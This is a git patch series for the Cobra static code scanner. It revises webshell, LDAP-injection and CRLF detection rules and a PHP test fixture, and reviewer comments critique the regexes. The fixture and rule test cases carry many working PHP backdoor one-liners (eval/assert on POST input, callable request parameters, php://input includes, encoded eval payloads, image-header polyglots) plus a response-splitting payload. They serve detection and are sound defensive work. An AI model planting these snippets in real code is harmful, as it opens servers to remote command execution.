@@ -1,41 +1,66 @@ -<?php -//cvi-360001 -eval($_POST['C']); - //cvi-360002 -$a="ss"; -include("sss.jpg"); +include "sss.jpg"; +include("sss_tmp"); +require_once "http://www.test.com/sss.php"; -//cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +//扫不出来.... +$a="http://www.test.com/sss.php"; +require_once $a; -//cvi-360004 -$string = 'AABBCCDDEE'; -preg_replace($_POST['A'], $_POST['B'], $string); +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); +//cvi-360017 换行挂 +$op=array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); -//cvi-360005 ????? -$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); +//cvi-360018 一句话 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); +//cvi-360019 换行挂 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); -//cvi-360006 换行就挂 -$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); +//cvi-360022 +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include('php://input'); -//cvi-360007 -array_map("ass\x65rt",(array)$_REQUEST['expdoor']); +//cvi-360023 特征值 +GIF87a<?php +BM<?php -//cvi-360008 +//cvi-360026 +$cb= 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); -//cvi-360009 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$evalstr=""; +ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); +echo $_REQUEST['pass']; +ob_end_flush(); +assert($evalstr); -//cvi-360010 换行就挂 -$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); +ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); +echo $_REQUEST['pass']; +ob_end_flush(); -//cvi-360011 换行就挂 -$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); +//cvi-360028 一句话 
+eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); +eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360012 换行就挂 -$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); -?> +//cvi-360034 一句话 +$_POST['sa']($_POST['sb']); +$_POST['sa']($_POST['sb'],$_POST['sc']); + +$sa = $_POST['sa']; +$sa($_POST['sb']); + +$sa = $_POST['sa']; +$sb = $_POST['sb']; +$sa($sb); + +$sa = $_POST['sa']; +$_POST($sa ); + + +?> From 554cd4c14a3f7fe0c0f008ac57d24e12855798b1 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:22:46 +0800 Subject: [PATCH 15/29] delete HRS + add LADP Injection --- rules/{CVI-250001.xml => CVI-165001.xml} | 10 ++++++-- rules/CVI-220001.xml | 32 ------------------------ 2 files changed, 8 insertions(+), 34 deletions(-) rename rules/{CVI-250001.xml => CVI-165001.xml} (62%) delete mode 100644 rules/CVI-220001.xml diff --git a/rules/CVI-250001.xml b/rules/CVI-165001.xml similarity index 62% rename from rules/CVI-250001.xml rename to rules/CVI-165001.xml index 73530215..6b8b4512 100644 --- a/rules/CVI-250001.xml +++ b/rules/CVI-165001.xml 
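Review bot: The comment `//扫不出来....` above `require_once $a;` records a known false negative (CVI-360002 only matches a quoted literal argument), but nothing ties it to a rule id, so whoever runs this fixture cannot tell whether the miss is expected or a regression. Make the marker explicit and attributable, e.g. `// cvi-360002 known miss: include path passed via variable, not matched`, and keep the `//cvi-NNNNNN` prefix the other sections use so every sample maps to exactly one rule.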
@@ -2,10 +2,16 @@
 <cobra document="https://github.com/wufeifei/cobra">
 <name value="LDAP注入"/>
 <language value="php"/>
- <match mode="function-param-controllable"><![CDATA[ldap_(add|delete|list|read|search|bind)]]></match>
+ <match mode="function-param-controllable"><![CDATA[(ldap_add|ldap_delete|ldap_list|ldap_read|ldap_search|ldap_bind)]]></match>
 <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair>
 <level value="5"/>
 <test>
+ <case assert="true"><![CDATA[
+ $surname=$_GET['surname'];
+ $filter = "(sn=" . $surname . ")";
+ $sr=ldap_search($ds, "o=My Company, c=US", $filter);
+ $info = ldap_get_entries($ds, $sr);
+ ]]></case>
 </test>
 <solution>
 ## 安全风险
@@ -15,7 +21,7 @@
 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息
 ## 修复方案
- 对用户输入数据中包含的”语言本身的保留字符”进行转义
+ 对用户输入数据中包含的”语言本身的保留字符”进行转义(例如可以使用`ldap_escape`)
 </solution>
 <status value="on"/>
diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml
deleted file mode 100644
index 863f50c5..00000000
--- a/rules/CVI-220001.xml
+++ /dev/null
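Review bot: The `<repair>` pattern only recognises `LDAP_ESCAPE_FILTER`, but three of the six functions in the new match list (`ldap_add`, `ldap_delete`, `ldap_bind`) take a DN, for which the correct escaping call is `ldap_escape($value, '', LDAP_ESCAPE_DN)`; code that escapes correctly for those functions will still be reported. Widen the repair to `ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_(FILTER|DN)\s*\)`. The added `<case>` only covers `ldap_search`; one case per listed function, plus one that contains the escape call and is expected not to fire (if the format supports a negative assert), would pin both halves of the rule. The `<cobra>` element starts and ends outside this hunk.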
@@ -1,32 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="HRS(CRLF)"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[header\s*\(\s*[^;]*\$_(GET|POST|REQUEST|SERVER|COOKIE)]]></match> - <level value="5"/> - <test> - <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> - </test> - <solution> - ## 安全风险 - CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 - 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. - CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) - - ## 修复方案 - 使用白名单判断 - - ## 代码示例 - - `<?php header("Location: ".$_GET["url"]); ?>` 构造 - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d<script>alert(1)</script>`发生注入 - - 修复方法:设置白名单,限制输入的URL - ```php - <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> - ``` - </solution> - - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file From adb2ed7b15982b0687494ad6024f60cdc73151a3 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 11:38:23 +0800 Subject: [PATCH 16/29] improve rules --- rules/CVI-360022.xml | 22 ++++++++++++++++++ rules/CVI-360023.xml | 16 +++++++++++++ rules/CVI-360026.xml | 36 ++++++++++++++++++++++++++++++ rules/CVI-360034.xml | 33 +++++++++++++++++++++++++++ tests/vulnerabilities/webshell.php | 35 +++++------------------------ 5 files changed, 113 insertions(+), 29 deletions(-) create mode 100644 rules/CVI-360022.xml create mode 100644 rules/CVI-360023.xml create mode 100644 rules/CVI-360026.xml create mode 100644 rules/CVI-360034.xml diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml new file mode 100644 index 00000000..7e110ed8 --- /dev/null +++ b/rules/CVI-360022.xml 
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell22"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[
+ ini_set('allow_url_include, 1');
+ include('php://input');
+ ]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml
new file mode 100644
index 00000000..ee83be9c
--- /dev/null
+++ b/rules/CVI-360023.xml
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell23"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match>
+ <level value="7"/>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml
new file mode 100644
index 00000000..e8d8ef15
--- /dev/null
+++ b/rules/CVI-360026.xml
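Review bot: `(\b\s)*` between the function name and `\(` is a roundabout way of writing `\s*` (a word boundary then one whitespace, repeated) and reads as if something more were intended; `\s*` says the same thing. The optional `(file_get_contents\s*\(\s*)?` branch has no `<case>`, since the single case only hits `include(`, so that branch is unverified; add a second case built from it. The `ini_set` line in the case plays no part in what the pattern matches and could be dropped from the CDATA to keep the fixture minimal.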
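Review bot: The pattern is anchored with `^` and has no `<test>`, so whether it fires depends entirely on the engine's flags: without MULTILINE, `^` matches only at the start of the file, and the `GIF87a<?php` / `BM<?php` lines that tests/vulnerabilities/webshell.php uses for cvi-360023 sit mid-file and would never match. Add a `<case assert="true">` whose CDATA begins with one of the magic prefixes followed by `<?php`, so the anchor semantics are pinned by the rule itself rather than by the shared fixture. `BM` and `\x00\x00\x01\x00\x01` are very short prefixes; a negative case for a plain PHP file would document the intended precision.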
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell26"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\))]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[
+ $cb= 'system';
+ ob_start($cb);
+ echo $_GET[c];
+ ob_end_flush();
+ ]]></case>
+ <case assert="true"><![CDATA[
+ $evalstr="";
+ ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
+ echo $_REQUEST['pass'];
+ ob_end_flush();
+ assert($evalstr);
+ ]]></case>
+ <case assert="true"><![CDATA[
+ ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
+ echo $_REQUEST['pass'];
+ ob_end_flush();
+ ]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml
new file mode 100644
index 00000000..ef937b79
--- /dev/null
+++ b/rules/CVI-360034.xml
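Review bot: As far as I can read the pattern, none of the three `<case assert="true">` samples can match it: both alternatives after `ob_start\s*\(+\s*` begin with `['\"]`, i.e. a quoted string as the first argument, while the cases pass `$cb`, a `function (...)` closure and another closure, none of which start with a quote. Either the cases are wrong for this rule or the pattern lacks a branch for a variable or closure argument; as written the tests and the match disagree and the harness should report all three as failing. Keep the cases only if the pattern is extended to cover those forms, and in any event add one case whose first argument is a quoted name from the alternation, which is the form the pattern actually requires.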
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell34"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[\$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[$_POST['sa']($_POST['sb']);]]></case>
+ <case assert="true"><![CDATA[$_POST['sa']($_POST['sb'],$_POST['sc']);]]></case>
+ <case assert="true"><![CDATA[
+ $sa = $_POST['sa'];
+ $sa($_POST['sb']);
+ ]]></case>
+ <case assert="true"><![CDATA[
+ $sa = $_POST['sa'];
+ $sb = $_POST['sb'];
+ $sa($sb);
+ ]]></case>
+ <case assert="true"><![CDATA[
+ $sa = $_POST['sa'];
+ $_POST($sa );
+ ]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php
index c0466aeb..5da752fa 100644
--- a/tests/vulnerabilities/webshell.php
+++ b/tests/vulnerabilities/webshell.php
@@ -9,13 +9,13 @@
 //cvi-360016
 filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
-//cvi-360017 换行挂
+//cvi-360017
 $op=array('options' => 'assert');
 filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op);
-//cvi-360018 一句话
+//cvi-360018
 mb_ereg_replace('.*', $_REQUEST['op'], '', 'e');
-//cvi-360019 换行挂
+//cvi-360019
 $e = "\ise";
 $data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e);
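Review bot: The two `[\s\S]*` gaps between the `$var = $_POST...` assignment and the later `$var(...)` call are unbounded, so the rule ties an assignment at the top of a file to a call any distance below it and, combined with the backreferences and nested alternation, backtracks heavily on large files; the sibling rules deleted in this patch bounded the same gap (`[\s\S]{0,200}`, `[\s\S]{0,1000}`). Use `[\s\S]{0,1000}` in both places; the five `<case>` samples are short and keep passing. The `@@ -9,13 +9,13 @@` hunk on tests/vulnerabilities/webshell.php that follows is comment-only and needs nothing.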
@@ -23,7 +23,7 @@ ini_set('allow_url_include, 1'); // Allow url inclusion in this script include('php://input'); -//cvi-360023 特征值 +//cvi-360023 GIF87a<?php BM<?php @@ -33,34 +33,11 @@ echo $_GET[c]; ob_end_flush(); -$evalstr=""; -ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); -echo $_REQUEST['pass']; -ob_end_flush(); -assert($evalstr); - -ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); -echo $_REQUEST['pass']; -ob_end_flush(); - -//cvi-360028 一句话 +//cvi-360028 eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360034 一句话 +//cvi-360034 $_POST['sa']($_POST['sb']); -$_POST['sa']($_POST['sb'],$_POST['sc']); - -$sa = $_POST['sa']; -$sa($_POST['sb']); - -$sa = $_POST['sa']; -$sb = $_POST['sb']; -$sa($sb); - -$sa = $_POST['sa']; -$_POST($sa ); - - ?> From a69e30381c6c5842b46bae9f77bb22f30adfbf10 Mon Sep 17 00:00:00 2001 
From: braveghz <braveghz@gmail.com> Date: Wed, 6 Sep 2017 12:02:53 +0800 Subject: [PATCH 17/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell=E6=89=AB?= =?UTF-8?q?=E6=8F=8F=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-140001.xml | 1 - rules/CVI-140002.xml | 3 +- rules/CVI-360001.xml | 21 ----- rules/CVI-360002.xml | 9 +- rules/CVI-360003.xml | 21 ----- rules/CVI-360007.xml | 11 ++- rules/CVI-360010.xml | 2 +- rules/CVI-360014.xml | 4 +- rules/CVI-360015.xml | 4 +- rules/CVI-360016.xml | 7 +- rules/CVI-360017.xml | 9 +- rules/CVI-360018.xml | 6 +- rules/CVI-360019.xml | 9 +- rules/CVI-360022.xml | 9 +- rules/CVI-360023.xml | 7 +- rules/CVI-360024.xml | 4 +- rules/CVI-360025.xml | 4 +- rules/CVI-360026.xml | 23 ++++- rules/CVI-360027.xml | 4 +- rules/CVI-360028.xml | 6 +- rules/CVI-360029.xml | 6 +- rules/CVI-360030.xml | 6 +- rules/CVI-360031.xml | 6 +- rules/CVI-360032.xml | 8 +- rules/CVI-360033.xml | 8 +- rules/CVI-360034.xml | 19 +++- rules/CVI-360035.xml | 21 ----- rules/CVI-360036.xml | 21 ----- rules/CVI-360037.xml | 21 ----- rules/CVI-360038.xml | 21 ----- rules/CVI-360039.xml | 21 ----- rules/CVI-360040.xml | 21 ----- rules/CVI-360041.xml | 21 ----- rules/CVI-360042.xml | 21 ----- rules/CVI-360043.xml | 21 ----- rules/CVI-360044.xml | 21 ----- rules/CVI-360045.xml | 21 ----- rules/CVI-360046.xml | 21 ----- rules/CVI-360047.xml | 21 ----- rules/CVI-360048.xml | 21 ----- rules/CVI-360049.xml | 21 ----- rules/CVI-360050.xml | 21 ----- rules/CVI-360051.xml | 21 ----- rules/CVI-360052.xml | 21 ----- tests/vulnerabilities/v.php | 6 +- tests/vulnerabilities/webshell.php | 136 +++++++++++++++++------------ 46 files changed, 170 insertions(+), 567 deletions(-) delete mode 100644 rules/CVI-360001.xml delete mode 100644 rules/CVI-360003.xml delete mode 100644 rules/CVI-360035.xml delete mode 100644 rules/CVI-360036.xml delete mode 100644 rules/CVI-360037.xml delete mode 100644 rules/CVI-360038.xml 
delete mode 100644 rules/CVI-360039.xml delete mode 100644 rules/CVI-360040.xml delete mode 100644 rules/CVI-360041.xml delete mode 100644 rules/CVI-360042.xml delete mode 100644 rules/CVI-360043.xml delete mode 100644 rules/CVI-360044.xml delete mode 100644 rules/CVI-360045.xml delete mode 100644 rules/CVI-360046.xml delete mode 100644 rules/CVI-360047.xml delete mode 100644 rules/CVI-360048.xml delete mode 100644 rules/CVI-360049.xml delete mode 100644 rules/CVI-360050.xml delete mode 100644 rules/CVI-360051.xml delete mode 100644 rules/CVI-360052.xml diff --git a/rules/CVI-140001.xml b/rules/CVI-140001.xml index 6b76a9bb..31d244ca 100644 --- a/rules/CVI-140001.xml +++ b/rules/CVI-140001.xml @@ -1,5 +1,4 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="文本框反射型XSS"/> <language value="jsp"/> diff --git a/rules/CVI-140002.xml b/rules/CVI-140002.xml index 6be5dbfd..852d0d45 100644 --- a/rules/CVI-140002.xml +++ b/rules/CVI-140002.xml @@ -1,7 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="输出入参"/> + <name value="输出入参可能导致XSS"/> <language value="java"/> <match mode="regex-only-match"><![CDATA[out\.println\s*\(\s*request\.get(Parameter|QueryString)\s*\(\s*\"]]></match> <level value="4"/> diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml deleted file mode 100644 index 0fb57ad6..00000000 --- a/rules/CVI-360001.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell1"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[eval($_POST['C']);]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 430020dd..557afde8 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml @@ -3,14 +3,13 @@ <name value="webshell2"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ + \s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+ ]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $a="ss"; - include("sss.jpg"); - ]]></case> + <case assert="true"><![CDATA[include "sss.jpg";]]></case> + <case assert="true"><![CDATA[include("sss_tmp");]]></case> + <case assert="true"><![CDATA[require_once "http://www.test.com/sss.php";]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml deleted file mode 100644 index 584f833b..00000000 --- a/rules/CVI-360003.xml +++ /dev/null 
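Review bot: The extension list in the rewritten CVI-360002 `<match>` (`jpg|png|txt|jpeg|log|tmp|db|cache`) still omits `gif`, although CVI-360023 in this same patch treats `GIF89a`/`GIF87a` as the polyglot headers to look for, so a shell dropped as `x.gif` and pulled in with `include("x.gif");` is not flagged by this rule. Widening it to `\.(jpg|png|gif|txt|jpeg|log|tmp|db|cache)` closes that gap without touching the `http://…` branch that the `{1,100}`→`{0,100}` relaxation was made for. The three new test cases are consistent with the pattern as far as I can trace it.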
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell3"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 6dcdd6e4..b107d531 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml 
@@ -1,17 +1,22 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell7"/> + <name value="PHP反射后门"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - (array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) + (new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))) ]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[array_map("ass\x65rt",(array)$_REQUEST['expdoor']);]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction($_GET[m]); + echo $func->invokeArgs(array($_GET[c],$_GET[id])); + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + [webshell样例 链接](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) ## 修复方案 删除 diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 6bbfb48a..2a5e05cb 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml 
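Review bot: The new `assert="true"` case `new ReflectionFunction($_GET[m])` does not appear to be matched by the new pattern: after the opening `(` the only unquoted alternative is `\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},…`, which demands a `,` before any `)`, but the sample's argument is `$_GET[m])` with no comma, so the case should fail if the harness executes it. Either relax that alternative to `\$_(GET|POST|REQUEST|COOKIE)\[[^;\)]{0,250}\)` or change the sample to one the rule actually catches. Separately, dropping `array_map|call_user_func|call_user_func_array|register_shutdown_function|register_tick_function` together with the `array_map("ass\x65rt", …)` case is a coverage loss for one of the most common one-liner shells unless another rule outside this view takes those callers over; worth confirming before merging.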
@@ -3,7 +3,7 @@ <name value="webshell10"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) ]]></match> <level value="7"/> <test> diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index fa367b59..4ef70460 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml 
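Review bot: Changing `[^,;]*?\\x` to `[^,;]*?\x` in the CVI-360010 pattern is a regression: inside the CDATA `\\x` was a regex escape for the literal two characters `\x` as they appear in obfuscated PHP such as `ass\x65rt`, whereas a bare `\x` is an incomplete hex escape — Python's `re` (which Cobra presumably uses) refuses to compile it, and PCRE would match a NUL byte, neither of which is intended. The other edit on the same line, `['\"]\\s*` → `['\"]\s*`, is a correct fix (the old form required a literal backslash before the quoted function name). Restore `[^,;]*?\\x|` and keep the `\s*` fix.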
